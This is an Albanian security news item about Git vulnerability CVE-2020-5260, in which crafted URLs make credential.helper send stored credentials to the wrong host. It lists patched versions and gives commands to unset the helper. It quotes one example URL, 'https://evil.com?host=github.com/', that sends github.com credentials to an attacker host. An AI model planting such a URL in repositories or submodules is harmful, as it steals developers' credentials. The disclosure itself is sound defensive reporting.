Vulnerabilitet në Git që çon në rrjedhjen e kredencialeve

Publikuar korrigjueset e lëshimeve të sistemit të shpërndarë të menaxhimit të kodeve burimore Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 dhe 2.17.4, në të cilat është eliminuar vulnerabiliteti (CVE-2020-5260) në përpunuesin "credential.helper" që çon në dërgimin e kredencialeve në host-in e gabuar kur klienti git lidhet me një depozitë përmes një URL-je të formatuar veçanërisht, duke përfshirë simbolet e linjës së re. Kjo ndjeshmëri mund të përdoret për të organizuar dërgimin në serverin e kontrolluar nga sulmuesi, të dhënave të tjera nga një host i ndryshëm.

Kur përcaktohet një URL në formatin «https://evil.com?host=github.com/», punëtorja e të dhënave duke u lidhur me hostin evil.com do të kalojë parametrat e autentifikimit të caktuar për github.com. Problemi shfaqet gjatë kryerjes së operacioneve të tilla si «git clone», duke përfshirë në përpunimin e URL-ve për submodulat (për shembull, gjatë ekzekutimit të «git submodule update», do të përpunohen automatikisht URL-të e caktuara në skedarin .gitmodules nga repo). Vulnerabiliteti ka rrezik më të madh në situata kur zhvilluesi kryen klonimin e repos pa e parë URL-në, për shembull, gjatë punës me submodulat, ose në sisteme që kryejnë veprime automatike, si në skenalet e ndërtimit të paketave.

Për të bllokuar ndjeshmërinë në versionet e reja është ndaluar kalimi i simbolit të linjës së re në çdo vlerë që dërgohet përmes këtij protokolli të shkëmbimit të kredencialeve. Për shpërndarjet, mund të ndiqni lëshimin e përditësimeve të paketave në faqet Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Si njĂ« zgjidhje pĂ«r tĂ« bllokuar problemin rekomandohet mos pĂ«rdorni credential.helper kur lidheni me depozita publike dhe mos aplikoni "git clone" nĂ« modalitetin "—recurse-submodules" me depozita tĂ« pa verifikuara. PĂ«r tĂ« çaktivizuar plotĂ«sisht pĂ«rpunuesin credential.helper, i cili kryen ruajtjen dhe tĂ«rheqjen e fjalĂ«kalimeve nga cache, e mbrojtur deponi ose skedari me fjalĂ«kalime, mund tĂ« pĂ«rdorni komandat:

git config —unset credential.helper
git config —global —unset credential.helper
git config —system —unset credential.helper

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster